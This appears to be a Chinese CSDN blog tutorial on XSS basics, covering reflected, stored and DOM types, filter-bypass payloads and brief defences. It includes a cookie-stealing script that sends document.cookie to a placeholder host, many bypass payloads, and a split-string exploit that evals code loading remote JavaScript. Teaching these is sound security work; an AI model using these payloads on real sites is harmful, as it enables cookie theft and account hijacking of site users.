XSS基础

最新推荐文章于 2023-05-07 13:22:12 发布
最新推荐文章于 2023-05-07 13:22:12 发布
阅读量267 收藏
点赞数 1
分类专栏: XSS 文章标签: xss web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43361634/article/details/113061422
版权

XSS基础

一、XSS是什么?

XSS是一种经常出现在web应用程序中的计算机安全漏洞,是由于web应用程序对用户的输入过滤不严而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码。
这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的HTML。

二、XSS漏洞原理

1.反射型

常见的就是在URL中构造,将恶意链接发送给目标用户。当用户访问该链接时候,会向服务器发起一个 GET请求来提交带有恶意代码的链接。造成反弹型XSS 主要是GET类型。
一般使用的将构造好的URL发给受害者,是受害者点击触发,而且只执行一次,非持久化。

2.存储型

存储型xss比反射型跨站脚本更具威胁性,并且可能影响到web服务器的自身安全。 此类XSS不需要用户点击特定的URL就能执行跨站脚本,攻击者事先讲恶意JavaScript代码上传或存储到漏洞服务器中,只要受害者浏览包含此恶意的代码的页面就会执行恶意代码。常见的就是在博客留言板、反馈投诉、论坛评论、将恶意代码和正文都存入服务器的数据库。每次访问都会触发恶意代码。

3.DOM型

DOM型是特殊的反射型XSS 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。基于这个特性,就可以利用JS脚本来实现XSS漏洞的利用。
例如:

<script>
var img=document.createElement("img");img.src="http://xxxx/a?"+escape(document.cookie);
</script>

三.XSS绕过

1.利用<>标记注射html/JavaScript

<script>alert("xss")</script>

2.利用html属性标签执行xss

很多html标签的属性都支持JavaScript:[code]伪协议的形式,这个特殊的协议类型声明了url的主体是任意的JavaScript代码,由JavaScript的解释器运行。

<img src="javascript:alert('xss');">
<table background=:javascript:alert('xss')"></table>

通常只有引用文件的属性才能触发跨站脚本

3.空格回车Tab 关键字拆分

JavaScript语句通常以分号结尾,若JavaScript引擎确定一个语句是完整的,而这一行的结尾有换行符,那么就可以省略分号。
除了在引号中分隔单词或强制结束语句之外,额外的空白无论以任何方式添加都无所谓

<img src="java
sc    ript:aler
t(/xss/)">

执行时任相当于
<img src="javascript:alert(/xss/)">

4.对标签属性值转码

html属性值本省支持ASCII码形式
TAB ASCII码为&#9
换行符 为&#10
回车符为 &# 13

<img src = "&#13;java&#10;script:alert('xss')">

5.产生自己的事件

<input type="button" value="cllick me" onclick="alert('xss')" />

<img src="#" onerror=alert(/xss/)>

6.css跨站剖析

各个浏览器之间不能通用

<div style="backgroundimage:url(javascript:alert('xss'))">

7.扰乱过滤规则

样式表中的/**/会被浏览器过滤
样式标签中的\ \0

8.字符编码

eval()
stringformcharcode()

9.拆分跨站法

著名安全研究员剑心曾发布一篇文章叫做《疯狂的跨站之行》,里面讲述了一种特别的Xss利用技巧,就是当应用程序没有过滤Xss关键字符人(如<、>)却对输入字符长度有限制的情况下,如何使用“拆分法”执行跨站脚本代码。

当时剑心发现某个网站存在Xss漏洞,漏洞出现在评论的联系方式处,但是,这处只能写入30个字符长度,必须的 就占用了17个字符,剩下的只有13个字符可以支配,如此一来,这个Xss只能用来弹出一个对话框。幸运的是,网站的评论处可以重复留言,也就是说可以提交多个脚本标记,于是剑心造出以下Expliot:

<script>z=’document.write’</script>
<script>z=z+’write(” ‘</script>
<script>z=z+<script></script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+.net/1.</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript’</script>
<script>eval(z)</script>

上述代码的作用是引入一个字符串变量Z,并且将下行代码拆分开来:

document.write('<scrip>  src=//www.shell.net/1.js></scrip>')

然后分几次将其嵌入到变量Z中,最后通过eval(Z)巧妙地执行代码。

4.XSS漏洞防御

1.过滤

2.实体化编码

B1ink326
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞分类
qq_39654116的博客
01-17 871
目录反射型XSS储存型XSS反射型XSS与存储型XSS的区别DOM XSS可能触发DOM型xss的属性DOM型例子Blind XSS 反射型XSS 反射型XSS是比较常见和广泛的一类,举例来说,当一个网站的代码中包含类似下面的语句:<?php echo "<p>hello, $_GET['user']</p>";?> ,那么在访问时设置 /?user=</p><script>alert("hack")</script><p>
mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)
weixin_29915703的博客
01-28 550
### 简要描述:Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它。这个漏洞应该是所有dz通杀的,我下载了最新版本的所以测试通过......### 详细说明:首先我们开启日志功能,然后存储一个xss看看:测试一个xss页面:[](https://images.seebug.or...
XSS (跨站脚本攻击) 分析与实战
未完成的歌~的博客
01-14 5791
文章目录一、漏洞原理1、XSS简介:2、XSS原理解析:3、XSS的分类:3.1、反射型XSS3.2、存储型XSS3.3、DOM型XSS二、靶场实战XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安全漏洞之一,这类漏洞能够使攻击者嵌入恶意脚本代码(一般是JS代
笔记:XSS浅析
04-13 1971
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言利用绕过 前言 XSS分类 反射型:非持久性,需要用户点击 存储型:持久性,代码存储在服务器,访问页面就可进行攻击 dom型(反射型):客户端脚本自身的解析不对导致的安全问题 利用 1.窃取COOLIE 2.恶意跳转 3.网页挂马/权限提升 4.通过msf生成木马url,调用反弹连解payload,设置监听ip,将木马url通过存储型XSS存储到服务器上,未打补丁访问者被攻击 绕过 1.无过滤 "><scrip.
【好文转载】linux反弹shell的各种姿势
自知.的博客
05-07 247
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是 通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹 shell来进行操作。在这里总结下反弹shell常见的几种姿势。
xss的概要介绍与分析
最新发布
08-18
在线教程与文档:提供XSS基础概念、工作原理、常见类型(如反射型、存储型、DOM型XSS)及最新攻击手法的详细解析,帮助读者建立全面的XSS认知。 安全测试工具:如OWASP Zap、Burp Suite等,这些工具能够帮助开发者和...
安装xss-labs ppt手册
10-22
1. **学习XSS基础知识**:在开始实际操作前,了解XSS的分类(反射型、存储型和DOM型)以及常见的攻击手段是非常重要的。理解XSS攻击的原理和危害,能够帮助你更好地应对挑战。 2. **准备Payload库**:XSS攻击往往...
XSS payload大全
01-22
- `<base href="javascript:/M/">`:通过base元素改变页面内所有相对路径的基础路径,使相对链接指向XSS攻击代码。 - `(1)">`:利用details和summary元素的交互特性,触发ontoggle事件来执行代码。 3. **XSS攻击...
xss漏洞讲解.pdf
04-22
综上所述,文档中涉及了XSS漏洞的多个方面,从基础法律知识讲起,逐步深入到XSS漏洞的原理、类型、测试方法、运用场景、绕过防护措施以及防护策略。此外,还包括了前端技术的基础知识,为深入理解和研究XSS攻击提供...
Xss跨站脚本攻击基础
04-11
### Xss跨站脚本攻击基础 #### 一、XSS攻击概述 XSS(Cross Site Scripting)攻击,即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。这种攻击方式利用网页开发时的疏忽,允许攻击者将恶意脚本注入到网页中,当...
Go-XSShell是一个XSS反向shell框架
08-14
XSShell是一个跨站点脚本的反向shell ...好吧,也许它不是一个真正的反向shell,但它允许你与XSS受害者的浏览器实时交互。
xss攻击突破转义_XSS 跨站脚本攻击总结
weixin_39881802的博客
11-21 584
漏洞起因可以输入的地方没有做好对应的过滤,引发的xss攻击漏洞危害盗取cookie劫持用户浏览器钓鱼攻击挂马在一定的条件下可以getshell会话劫持漏洞类型反射型XSS(危险级别:低),插入的语句停留在当前页面。DOM型XSS (危险级别:中), DOM型xss又分为两种 (a.可见型、b.不可见型),插入的语句影响js 。存储型XSS(危险级别:高),插入的语句保存在数据库 。其他型XSS(例...
最简单的反射型XSS拿cookie
thislocal的博客
03-29 1万+
参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》 主要是关于XSS的。更准确一点,关于盗取cookie的,且是反射型。其实就是最简单的一个反射型cookie盗取过程。 一、XSS的一般过程: 1、找到XSS漏洞,假设存在于网站A; 2、发送可以触发该漏洞的,特定代码到攻击目标; 可以这样构造:凤姐最新性感视频 其中,www.foo.com/xss/xss.php?x=是存在漏洞的
反射式 XSS 的解释及其防御
weixin_33975951的博客
03-13 2387
编译自:blog.sqreen.io/reflected-x…原作者:JB  发表时间:2018-03-08译者:西楼听雨什么是反射式跨站脚本攻击(reflected XSS)? 首先,我们来了解下什么是"跨站脚本攻击(XSS)":它是通过向网站注入恶意代码实现的,当某个用户访问受感染的页面时,脚本就会在其浏览器中执行,这时,攻击者就可以窃取用户的私有信息,例如,cookie、账户信息;也可以以受...
XSS攻击——从不知道xss到稍微知道xss
净邪的博客
05-31 1760
什么是XSS? 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 XSS主要拼接的是什么? SQL注入拼接的是操作数据库的SQL语句。XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML) xss能做什么? 盗取Cookie(用的最频繁的) 获取内网ip 获取浏览器保存的明文密码 截取网页屏幕 网页上...
XSS漏洞介绍及反射型XSS
热门推荐
weixin_44720762的博客
04-28 2万+
什么是XSS攻击: XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制–例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。 XSS分类: 类型A,本地利用漏洞,这种漏...
XSS漏洞
bobi1024的博客
10-24 4547
XSS漏洞一.反射型XSS攻击流程DOM型XSS二.储存型XSS攻击流程![储存型XSS](https://img-blog.csdnimg.cn/4ef92ba721d64a80ad436afb3304c30c.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYm9iaTEwMjQ=,size_19,color_FFFFFF,t_70,g_se,x_16)Blind型XSS三.反射型
XSS的原理分析、反射型XSS
weixin_41487522的博客
05-06 2318
XSS的原理分析 XSS的原理和特性 XSS可以理解为html代码的注入。 这里简单回顾一下注入: 注入的两个关键条件: 1.用户输入能够控制输入 2.原本程序要执行的代码,拼接了用户输入的数据 这里XSS拼接的就是网页的html代码,一般而言我们是可以拼接出合适的html代码去执行恶意的JS语句。 因为达到各种各样的效果需要比较复杂的代码,所以XSS平台应运而生: xsspt.com(开放注册)...
渗透测试 ,XSS基础知识
07-23
XSS(Cross-Site Scripting)是一种常见的网站安全漏洞,攻击者通过在网页中注入恶意脚本来攻击用户。以下是关于 XSS基础知识: 1. XSS 的原理:XSS 攻击利用了网站对用户输入的信任,攻击者将恶意脚本注入到网页中,当用户浏览该网页时,恶意脚本会在用户的浏览器中执行,从而达到攻击的目的。 2. XSS 的分类:XSS 可以分为三种主要类型:存储型(Stored XSS)、反射型(Reflected XSS)和 DOM 型(DOM-based XSS)。存储型 XSS 注入的恶意脚本被存储在目标网站的数据库中,当其他用户访问该页面时,恶意脚本会被执行。反射型 XSS 注入的恶意脚本通过 URL 参数传递给目标网站,目标网站在返回的页面中直接输出了这些恶意脚本,用户点击链接时脚本被执行。DOM 型 XSS 则是利用了网页的 DOM 结构,通过修改 DOM 中的内容来触发漏洞。 3. XSS 的危害:XSS 攻击可以导致许多危害,包括盗取用户的敏感信息(如用户名、密码、cookie)、篡改网页内容、进行钓鱼攻击、传播恶意软件等。 4. 防御 XSS 的措施:为了防止 XSS 攻击,可以采取以下措施: - 输入验证和过滤:对用户输入的数据进行验证和过滤,过滤掉不可信的字符和脚本。 - 输出转义:将用户输入的数据进行转义,确保输出到网页时不会被浏览器解析为可执行的脚本。 - 使用 HTTP 头部中的 Content Security Policy(CSP)来限制网页的资源加载和执行。 - 设置 HttpOnly 属性来限制 JavaScript 对 cookie 的访问。 - 定期更新和修复网站的漏洞,以防止攻击者利用已知的 XSS 漏洞。 以上是关于 XSS基础知识,深入了解 XSS 攻击的原理和防御措施对于网站安全至关重要。在进行渗透测试时,理解 XSS 的工作原理和常见漏洞场景可以帮助你更好地发现和利用 XSS 漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值